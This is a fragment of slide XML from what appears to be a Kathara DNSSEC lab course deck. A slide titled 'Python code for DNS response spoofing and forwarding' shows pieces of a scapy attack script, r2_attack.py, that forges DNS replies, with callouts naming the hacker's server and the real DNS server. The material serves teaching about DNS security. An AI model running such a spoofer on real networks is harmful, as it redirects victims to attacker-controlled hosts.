                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Ether</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>].</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>src</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>src</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Ether</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>].</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dst</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>            </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip_layer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> = IP(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>src</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[IP].</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dst</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dst</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[IP].</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>src</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>            </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>udp_layer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> = UDP(sport=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[UDP].</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dport</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dport</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[UDP].sport)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>            </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dns_layer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> = DNS(</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>                id=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[DNS].id,</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CB88938-9841-5D27-0F4B-D4C28B0DF23E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="176" y="3327"/>
              <a:ext cx="1939" cy="50"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/r2/r2_attack.py</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8DE1A29-3C24-5DD6-D3F0-E43E277B049A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1571624" y="116632"/>
            <a:ext cx="10010775" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Python code for DNS response spoofing and forwarding</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{927FEA49-9AEF-0007-040A-2D1052587A6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91D84ED6-1E9B-3194-87F1-F8EB3E8FDFC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6641533-5B50-105B-EE22-EFBD746E8FCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5794962" y="1400182"/>
            <a:ext cx="3470176" cy="685345"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -105095"/>
              <a:gd name="adj2" fmla="val 70759"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effec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dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>IP address of the hacker's server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DEAE85E-1FC6-6A34-30DB-8BE8DA76BA93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7617902" y="2189080"/>
            <a:ext cx="3470176" cy="685345"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -143423"/>
              <a:gd name="adj2" fmla="val 13578"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effec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dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>IP address of the university's real DNS server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93C9BB4F-4A80-D4EE-167A-93338D13876E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7617902" y="3249387"/>
            <a:ext cx="3470176" cy="685345"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -168404"/>
              <a:gd name="adj2" fmla="val -97317"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effec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dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>network card on which the script should work</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{551CA55C-0723-386E-4420-9E6CFC1F89F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7617902" y="4309694"/>
            <a:ext cx="3470176" cy="685345"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -133498"/>
              <a:gd name="adj2" fmla="val -194351"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effec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dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>keyword we look for in DNS queries</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30457679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883565-1BA4-688E-45AB-A85FD1FC0E11}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F816F2A5-E2DB-57FF-F4F6-C1397E0C3C9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1103922" y="1429205"/>
            <a:ext cx="10478478" cy="4723944"/>
            <a:chOff x="126" y="3327"/>
            <a:chExt cx="5943" cy="759"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{067FB6AC-037F-D6E6-58CA-7CC8EEA31235}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3360"/>
              <a:ext cx="5943" cy="726"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>from </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>scapy.all</a:t>
